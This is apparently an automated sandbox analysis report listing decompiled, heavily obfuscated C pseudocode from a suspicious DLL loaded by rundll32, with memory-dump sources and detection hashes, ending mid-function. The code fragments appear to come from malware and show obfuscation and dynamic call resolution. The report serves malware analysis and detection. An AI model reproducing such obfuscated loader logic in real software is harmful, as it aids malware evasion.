                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00346C29() {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				void* _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t89;
                                                                                                                      				intOrPtr _t98;
                                                                                                                      				signed int _t102;
                                                                                                                      				signed int _t103;
                                                                                                                      				void* _t105;
                                                                                                                      
                                                                                                                      				_v48 = 0xcb88bc;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t102 = 0x47;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t89 = 0xf0122cf;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v16 = 0x79c750;
                                                                                                                      				_v16 = _v16 + 0x2192;
                                                                                                                      				_v16 = _v16 ^ 0x37fffb71;
                                                                                                                      				_v16 = _v16 + 0xffff9df1;
                                                                                                                      				_v16 = _v16 ^ 0x3784de23;
                                                                                                                      				_v12 = 0x72aa7c;
                                                                                                                      				_v12 = _v12 * 0x4d;
                                                                                                                      				_v12 = _v12 + 0x37d5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x02292cf3;
                                                                                                                      				_v8 = 0x96e633;
                                                                                                                      				_v8 = _v8 ^ 0x4b98ff22;
                                                                                                                      				_v8 = _v8 ^ 0x9d1458e0;
                                                                                                                      				_v8 = _v8 | 0xdef8ea17;
                                                                                                                      				_v8 = _v8 ^ 0xdef824a2;
                                                                                                                      				_v28 = 0x117d;
                                                                                                                      				_v28 = _v28 / _t102;
                                                                                                                      				_v28 = _v28 >> 0x10;
                                                                                                                      				_v28 = _v28 ^ 0x00058012;
                                                                                                                      				_v24 = 0x3d67df;
                                                                                                                      				_v24 = _v24 | 0x442c4c66;
                                                                                                                      				_t44 =  &_v24; // 0x442c4c66
                                                                                                                      				_t103 = 0x76;
                                                                                                                      				_v24 =  *_t44 / _t103;
                                                                                                                      				_v24 = _v24 ^ 0x009d94f1;
                                                                                                                      				_v32 = 0x4e376f;
                                                                                                                      				_v32 = _v32 << 0xd;
                                                                                                                      				_v32 = _v32 ^ 0xc6ef13b7;
                                                                                                                      				_v20 = 0x3e602c;
                                                                                                                      				_v20 = _v20 ^ 0x8d0d4ca7;
                                                                                                                      				_v20 = _v20 << 6;
                                                                                                                      				_v20 = _v20 * 0x6d;
                                                                                                                      				_v20 = _v20 ^ 0xb2734839;
                                                                                                                      				do {
                                                                                                                      					while(_t89 != 0x600d2ee) {
                                                                                                                      						if(_t89 == 0xf0122cf) {
                                                                                                                      							_push(_t89);
                                                                                                                      							_push(_t89);
                                                                                                                      							 *0x365210 = E00353512(0x138);
                                                                                                                      							_t89 = 0x600d2ee;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L5;
                                                                                                                      					}
                                                                                                                      					_t98 =  *0x365210; // 0x0
                                                                                                                      					E0035A156(_v28, _t98 + 0x1c, _v24, _v32, _v20);
                                                                                                                      					_t105 = _t105 + 0xc;
                                                                                                                      					_t89 = 0x7d77246;
                                                                                                                      					L5:
                                                                                                                      				} while (_t89 != 0x7d77246);
                                                                                                                      				return 1;
                                                                                                                      			}


















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,`>$fL,D$o7N
                                                                                                                      • API String ID: 0-3130479144
                                                                                                                      • Opcode ID: a796a650282fe167710ca134a337936592ae9b98c046e5dd4150a3e529b72f29
                                                                                                                      • Instruction ID: fe2b261cd0733e7d749d826f4c6b60f620c6177f3d4ea993b179ff93364da052
                                                                                                                      • Opcode Fuzzy Hash: a796a650282fe167710ca134a337936592ae9b98c046e5dd4150a3e529b72f29
                                                                                                                      • Instruction Fuzzy Hash: 934147B1E0020AEBDF49CFA4D9864EEBBB1FF45314F208559D512A7260E3B45B45CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00346ED6(intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t87;
                                                                                                                      				void* _t89;
                                                                                                                      				intOrPtr* _t90;
                                                                                                                      				signed int _t93;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      
                                                                                                                      				_v48 = 0x387a4d;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v40 = 0;
                                                                                                                      				_v24 = 0x2424c8;
                                                                                                                      				_v24 = _v24 ^ 0x2613c361;
                                                                                                                      				_t93 = 0x67;
                                                                                                                      				_t104 = _a4;
                                                                                                                      				_v24 = _v24 * 0x39;
                                                                                                                      				_v24 = _v24 ^ 0x8272caac;
                                                                                                                      				_v8 = 0x1db7b6;
                                                                                                                      				_v8 = _v8 * 0x22;
                                                                                                                      				_v8 = _v8 + 0xffff08c1;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0x7e2ce57a;
                                                                                                                      				_v32 = 0xc3f5b3;
                                                                                                                      				_v32 = _v32 * 0x7f;
                                                                                                                      				_v32 = _v32 ^ 0x61389900;
                                                                                                                      				_v12 = 0x2d74a5;
                                                                                                                      				_v12 = _v12 / _t93;
                                                                                                                      				_v12 = _v12 + 0xffffbd08;
                                                                                                                      				_v12 = _v12 * 0x6a;
                                                                                                                      				_v12 = _v12 ^ 0x0019f3c3;
                                                                                                                      				_v28 = 0x7d8734;
                                                                                                                      				_v28 = _v28 >> 7;
                                                                                                                      				_v28 = _v28 << 1;
                                                                                                                      				_v28 = _v28 ^ 0x000207bd;
                                                                                                                      				_v20 = 0x79f3b3;
                                                                                                                      				_v20 = _v20 | 0xe743018d;
                                                                                                                      				_v20 = _v20 + 0xb3b6;
                                                                                                                      				_v20 = _v20 + 0x51ad;
                                                                                                                      				_v20 = _v20 ^ 0xe775faa1;
                                                                                                                      				_v36 = 0x6d6a5a;
                                                                                                                      				_v36 = _v36 << 0xd;
                                                                                                                      				_v36 = _v36 ^ 0xad48a6bc;
                                                                                                                      				_v16 = 0x62a4bc;
                                                                                                                      				_v16 = _v16 >> 7;
                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                      				_v16 = _v16 * 0x38;
                                                                                                                      				_v16 = _v16 ^ 0xac926db4;
                                                                                                                      				_t87 =  *((intOrPtr*)(_t104 + 0xc))( *((intOrPtr*)(_t104 + 0x30)), 1, 0);
                                                                                                                      				_t109 = _t87;
                                                                                                                      				if(_t87 != 0) {
                                                                                                                      					_push(0x34188c);
                                                                                                                      					_push(_v32);
                                                                                                                      					_t72 =  &_v8; // 0x7e2ce57a
                                                                                                                      					_t89 = E0034BB4B(_v24,  *_t72, _t109);
                                                                                                                      					_push( *((intOrPtr*)(_t104 + 0x30)));
                                                                                                                      					_t106 = _t89;
                                                                                                                      					_push(_v28);
                                                                                                                      					_t90 = E00359861(_v12, _t89);
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						 *_t90();
                                                                                                                      					}
                                                                                                                      					E0034AE03(_v20, _v36, _v16, _t106);
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Mz8$Zjm$z,~
                                                                                                                      • API String ID: 0-2456983437
                                                                                                                      • Opcode ID: 93148ac4cff036bdf7f7595af45494adce609ee81f9257f73854ac39d9ca41d1
                                                                                                                      • Instruction ID: 2c096251c001b55268337ee9e146ffbd42c2107f68fd5a9c34bc4d0d61825ac9
                                                                                                                      • Opcode Fuzzy Hash: 93148ac4cff036bdf7f7595af45494adce609ee81f9257f73854ac39d9ca41d1
                                                                                                                      • Instruction Fuzzy Hash: 06410F71D0131AABCF09CFA1C98A8EEBBB1FB44314F20815AD821B6250D7B95B55CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00363672() {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				intOrPtr _t69;
                                                                                                                      				intOrPtr _t71;
                                                                                                                      
                                                                                                                      				_v16 = 0x1920f4;
                                                                                                                      				_v16 = _v16 | 0xcc0e70e0;
                                                                                                                      				_v16 = _v16 + 0xffff67e9;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x00056687;
                                                                                                                      				_v12 = 0xe97d2f;
                                                                                                                      				_v12 = _v12 * 5;
                                                                                                                      				_v12 = _v12 + 0xdb12;
                                                                                                                      				_v12 = _v12 ^ 0x6ef3d177;
                                                                                                                      				_v12 = _v12 ^ 0x6a6f4e7b;
                                                                                                                      				_v8 = 0xee58e5;
                                                                                                                      				_v8 = _v8 + 0xffff20e4;
                                                                                                                      				_v8 = _v8 + 0x2db7;
                                                                                                                      				_v8 = _v8 + 0xffff706b;
                                                                                                                      				_v8 = _v8 ^ 0x00e27cba;
                                                                                                                      				_v24 = 0x674fea;
                                                                                                                      				_v24 = _v24 << 0xd;
                                                                                                                      				_v24 = _v24 << 0xe;
                                                                                                                      				_v24 = _v24 + 0xffff2a40;
                                                                                                                      				_v24 = _v24 ^ 0x4ff265ad;
                                                                                                                      				_v32 = 0x2c6dbe;
                                                                                                                      				_v32 = _v32 >> 2;
                                                                                                                      				_v32 = _v32 ^ 0x000c65e7;
                                                                                                                      				_v20 = 0xd3ac82;
                                                                                                                      				_v20 = _v20 * 0x77;
                                                                                                                      				_v20 = _v20 << 0xc;
                                                                                                                      				_v20 = _v20 + 0x1c1c;
                                                                                                                      				_v20 = _v20 ^ 0x53000be4;
                                                                                                                      				_v28 = 0xd3eaf5;
                                                                                                                      				_v28 = _v28 ^ 0xd0f82d1e;
                                                                                                                      				_v28 = _v28 << 9;
                                                                                                                      				_v28 = _v28 ^ 0x57832eb1;
                                                                                                                      				_t69 =  *0x365c9c; // 0x0
                                                                                                                      				E0035E884(_v16, _v12, _v8,  *((intOrPtr*)(_t69 + 0x50)));
                                                                                                                      				_t71 =  *0x365c9c; // 0x0
                                                                                                                      				return E003468DE(_v24, _v32, _v20, _v28,  *((intOrPtr*)(_t71 + 0x58)));
                                                                                                                      			}













                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {Noj$Og$X
                                                                                                                      • API String ID: 0-3024020846
                                                                                                                      • Opcode ID: 37796aa7341f54fca73baffffb1ff08bd463588895d51453ceca308a18707f4e
                                                                                                                      • Instruction ID: 33889f2df1fdcb0c6bbd26b20ce24562713dadac01b70f4233f33f0dd2d2dacc
                                                                                                                      • Opcode Fuzzy Hash: 37796aa7341f54fca73baffffb1ff08bd463588895d51453ceca308a18707f4e
                                                                                                                      • Instruction Fuzzy Hash: 7D31A1B6C0170AEBCF45DFE4C94A8AEFBB0BB50308F208588D51166261D7B54B59DF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0034CA43(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                      				char _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				void* _t229;
                                                                                                                      				void* _t247;
                                                                                                                      				void* _t251;
                                                                                                                      				void* _t257;
                                                                                                                      				void* _t260;
                                                                                                                      				void* _t261;
                                                                                                                      				void* _t263;
                                                                                                                      				intOrPtr _t288;
                                                                                                                      				signed int _t289;
                                                                                                                      				signed int _t290;
                                                                                                                      				signed int _t291;
                                                                                                                      				signed int _t292;
                                                                                                                      				void* _t294;
                                                                                                                      				void* _t295;
                                                                                                                      
                                                                                                                      				_push(_a16);
                                                                                                                      				_t287 = _a12;
                                                                                                                      				_t261 = __ecx;
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t229);
                                                                                                                      				_v64 = 0x836860;
                                                                                                                      				_t288 = 0;
                                                                                                                      				_v60 = 0x763ad4;
                                                                                                                      				_t295 = _t294 + 0x18;
                                                                                                                      				_v56 = 0;
                                                                                                                      				_v132 = 0xf23cd2;
                                                                                                                      				_t263 = 0x1cd9a3d;
                                                                                                                      				_v132 = _v132 + 0xffff66b2;
                                                                                                                      				_v132 = _v132 + 0xffff69fc;
                                                                                                                      				_v132 = _v132 << 8;
                                                                                                                      				_v132 = _v132 ^ 0xf1039f05;
                                                                                                                      				_v140 = 0x375552;
                                                                                                                      				_v140 = _v140 << 6;
                                                                                                                      				_v140 = _v140 ^ 0xd2a5ef1f;
                                                                                                                      				_v140 = _v140 >> 0xb;
                                                                                                                      				_v140 = _v140 ^ 0x00122384;
                                                                                                                      				_v108 = 0x5e168a;
                                                                                                                      				_v108 = _v108 >> 0x10;
                                                                                                                      				_v108 = _v108 + 0xda32;
                                                                                                                      				_v108 = _v108 ^ 0x00005a0c;
                                                                                                                      				_v116 = 0x4fe29d;
                                                                                                                      				_v116 = _v116 >> 0x10;
                                                                                                                      				_v116 = _v116 << 4;
                                                                                                                      				_v116 = _v116 ^ 0x0003d351;
                                                                                                                      				_v88 = 0xa9a316;
                                                                                                                      				_v88 = _v88 + 0xe91b;
                                                                                                                      				_v88 = _v88 ^ 0x00a1e0df;
                                                                                                                      				_v136 = 0x77a290;
                                                                                                                      				_v136 = _v136 << 0xc;
                                                                                                                      				_t289 = 0x74;
                                                                                                                      				_v136 = _v136 / _t289;
                                                                                                                      				_v136 = _v136 + 0xffff257b;
                                                                                                                      				_v136 = _v136 ^ 0x01061e79;
                                                                                                                      				_v152 = 0x936910;
                                                                                                                      				_v152 = _v152 * 0x7a;
                                                                                                                      				_v152 = _v152 >> 3;
                                                                                                                      				_v152 = _v152 + 0xffff8db3;
                                                                                                                      				_v152 = _v152 ^ 0x08cdb86a;
                                                                                                                      				_v128 = 0x509c4c;
                                                                                                                      				_v128 = _v128 + 0x81f1;
                                                                                                                      				_v128 = _v128 + 0x9dbc;
                                                                                                                      				_v128 = _v128 >> 5;
                                                                                                                      				_v128 = _v128 ^ 0x00071675;
                                                                                                                      				_v148 = 0xcab80c;
                                                                                                                      				_v148 = _v148 >> 0xd;
                                                                                                                      				_v148 = _v148 | 0x660debd0;
                                                                                                                      				_v148 = _v148 + 0xf630;
                                                                                                                      				_v148 = _v148 ^ 0x660fbc32;
                                                                                                                      				_v104 = 0xc88284;
                                                                                                                      				_v104 = _v104 ^ 0xe0b202bb;
                                                                                                                      				_v104 = _v104 * 0x70;
                                                                                                                      				_v104 = _v104 ^ 0x35911582;
                                                                                                                      				_v84 = 0x688efd;
                                                                                                                      				_v84 = _v84 ^ 0xa5781683;
                                                                                                                      				_v84 = _v84 ^ 0xa515c2ff;
                                                                                                                      				_v156 = 0x3b8040;
                                                                                                                      				_v156 = _v156 | 0xffdbffba;
                                                                                                                      				_v156 = _v156 ^ 0xfff6b3f0;
                                                                                                                      				_v72 = 0x8d74e9;
                                                                                                                      				_v72 = _v72 >> 8;
                                                                                                                      				_v72 = _v72 ^ 0x0004dfda;
                                                                                                                      				_v160 = 0xbd1b1c;
                                                                                                                      				_v160 = _v160 << 0xc;
                                                                                                                      				_v160 = _v160 | 0x33bb8ca8;
                                                                                                                      				_v160 = _v160 ^ 0xcf7854ed;
                                                                                                                      				_v160 = _v160 ^ 0x3ccd45a9;
                                                                                                                      				_v120 = 0x48e6fb;
                                                                                                                      				_v120 = _v120 | 0xe61fffb2;
                                                                                                                      				_v120 = _v120 ^ 0xe6598779;
                                                                                                                      				_v68 = 0x77306;
                                                                                                                      				_v68 = _v68 >> 6;
                                                                                                                      				_v68 = _v68 ^ 0x0008dc17;
                                                                                                                      				_v112 = 0x774006;
                                                                                                                      				_v112 = _v112 << 0xd;
                                                                                                                      				_v112 = _v112 + 0xffffb426;
                                                                                                                      				_v112 = _v112 ^ 0xe80ab914;
                                                                                                                      				_v144 = 0x2b5eea;
                                                                                                                      				_t290 = 0x79;
                                                                                                                      				_v144 = _v144 * 0x59;
                                                                                                                      				_v144 = _v144 + 0xffffa818;
                                                                                                                      				_v144 = _v144 ^ 0xb076c16e;
                                                                                                                      				_v144 = _v144 ^ 0xbf611da3;
                                                                                                                      				_v96 = 0xa17410;
                                                                                                                      				_v96 = _v96 | 0x939b80d1;
                                                                                                                      				_v96 = _v96 / _t290;
                                                                                                                      				_v96 = _v96 ^ 0x01375591;
                                                                                                                      				_v80 = 0xb3b8;
                                                                                                                      				_t291 = 0x5c;
                                                                                                                      				_v80 = _v80 / _t291;
                                                                                                                      				_v80 = _v80 ^ 0x0003830b;
                                                                                                                      				_v76 = 0xc52b4a;
                                                                                                                      				_v76 = _v76 >> 0xe;
                                                                                                                      				_v76 = _v76 ^ 0x00071242;
                                                                                                                      				_v92 = 0xc8fd49;
                                                                                                                      				_t292 = 0x54;
                                                                                                                      				_v92 = _v92 / _t292;
                                                                                                                      				_v92 = _v92 ^ 0x044db90d;
                                                                                                                      				_v92 = _v92 ^ 0x044d9acc;
                                                                                                                      				_v100 = 0x5afe59;
                                                                                                                      				_v100 = _v100 ^ 0x0de7f0e8;
                                                                                                                      				_v100 = _v100 | 0x5cb6a54b;
                                                                                                                      				_v100 = _v100 ^ 0x5db2bb74;
                                                                                                                      				_v124 = 0xa19aac;
                                                                                                                      				_v124 = _v124 + 0xffff97b1;
                                                                                                                      				_v124 = _v124 * 0x3e;
                                                                                                                      				_v124 = _v124 >> 0xe;
                                                                                                                      				_v124 = _v124 ^ 0x000bad60;
                                                                                                                      				while(_t263 != 0xd5ede2) {
                                                                                                                      					if(_t263 == 0x1cd9a3d) {
                                                                                                                      						_t263 = 0xd5ede2;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						if(_t263 == 0x72d0ec7) {
                                                                                                                      							_t247 = E0034B09F(_v148, _v104,  &_v52, _v84, _t287 + 8, _v156);
                                                                                                                      							_t295 = _t295 + 0x10;
                                                                                                                      							__eflags = _t247;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								_t263 = 0x78e1ae6;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t263 == 0x78e1ae6) {
                                                                                                                      								_t251 = E0034B09F(_v72, _v160,  &_v52, _v120, _t287 + 0xc, _v68);
                                                                                                                      								_t295 = _t295 + 0x10;
                                                                                                                      								__eflags = _t251;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t263 = 0xabcd4f8;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t263 == 0x7ae58b3) {
                                                                                                                      									__eflags = E0035B9B1(_v76, _v92, __eflags, _t287 + 0x2c, _v100,  &_v52, _v124);
                                                                                                                      									_t288 =  !=  ? 1 : _t288;
                                                                                                                      								} else {
                                                                                                                      									if(_t263 == 0xabcd4f8) {
                                                                                                                      										_t257 = E0034B09F(_v112, _v144,  &_v52, _v96, _t287 + 0x40, _v80);
                                                                                                                      										_t295 = _t295 + 0x10;
                                                                                                                      										__eflags = _t257;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t263 = 0x7ae58b3;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t263 != 0xc0b979a) {
                                                                                                                      											L18:
                                                                                                                      											__eflags = _t263 - 0x38140c5;
                                                                                                                      											if(__eflags != 0) {
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											_t260 = E0034B09F(_v88, _v136,  &_v52, _v152, _t287 + 0x38, _v128);
                                                                                                                      											_t295 = _t295 + 0x10;
                                                                                                                      											if(_t260 != 0) {
                                                                                                                      												_t263 = 0x72d0ec7;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t288;
                                                                                                                      				}
                                                                                                                      				E003564C5(_v132, _v140, _v108, _v116, _t261,  &_v52);
                                                                                                                      				_t295 = _t295 + 0x10;
                                                                                                                      				_t263 = 0xc0b979a;
                                                                                                                      				goto L18;
                                                                                                                      			}














































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RU7$^+
                                                                                                                      • API String ID: 0-4228232731
                                                                                                                      • Opcode ID: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction ID: b163b94568a43deaedd92adc9e0380345f89afeaa8b08845bd920bb973de2e91
                                                                                                                      • Opcode Fuzzy Hash: 7af6df2ff8a9b6f82361f13cbade41a7c387482da999aa364547f9e347cbb905
                                                                                                                      • Instruction Fuzzy Hash: C9C151711083859FD7A9CE61C88981BFBE5FBC4388F10891DF69686260D7B5D949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0035BE8C() {
                                                                                                                      				char _v524;
                                                                                                                      				intOrPtr _v548;
                                                                                                                      				char _v564;
                                                                                                                      				void* _v576;
                                                                                                                      				intOrPtr _v580;
                                                                                                                      				intOrPtr _v584;
                                                                                                                      				char _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _t217;
                                                                                                                      				signed int _t223;
                                                                                                                      				void* _t224;
                                                                                                                      				void* _t226;
                                                                                                                      				signed int _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t248;
                                                                                                                      				void* _t251;
                                                                                                                      				void* _t256;
                                                                                                                      				void* _t258;
                                                                                                                      
                                                                                                                      				_v580 = 0x2596f5;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t227 = 0;
                                                                                                                      				_t229 = 0x1e;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t251 = 0x1d7b34c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v624 = 0x892a55;
                                                                                                                      				_v624 = _v624 | 0xee7fd748;
                                                                                                                      				_v624 = _v624 ^ 0xeeffffdd;
                                                                                                                      				_v620 = 0x622f6;
                                                                                                                      				_v620 = _v620 + 0xbb0c;
                                                                                                                      				_v620 = _v620 + 0xffff07a8;
                                                                                                                      				_v620 = _v620 ^ 0x0005e5ab;
                                                                                                                      				_v632 = 0xb1aa42;
                                                                                                                      				_v632 = _v632 + 0xffffd879;
                                                                                                                      				_v632 = _v632 << 7;
                                                                                                                      				_v632 = _v632 ^ 0x58c15d83;
                                                                                                                      				_v668 = 0xaf491c;
                                                                                                                      				_v668 = _v668 | 0xa282f1df;
                                                                                                                      				_v668 = _v668 * 0x52;
                                                                                                                      				_v668 = _v668 ^ 0xbc704b9b;
                                                                                                                      				_v668 = _v668 ^ 0xa02fbf7e;
                                                                                                                      				_v604 = 0x754ed8;
                                                                                                                      				_v604 = _v604 / _t229;
                                                                                                                      				_v604 = _v604 ^ 0x00089259;
                                                                                                                      				_v636 = 0x96d5f2;
                                                                                                                      				_v636 = _v636 + 0xd4a1;
                                                                                                                      				_t230 = 0x30;
                                                                                                                      				_v636 = _v636 * 0x11;
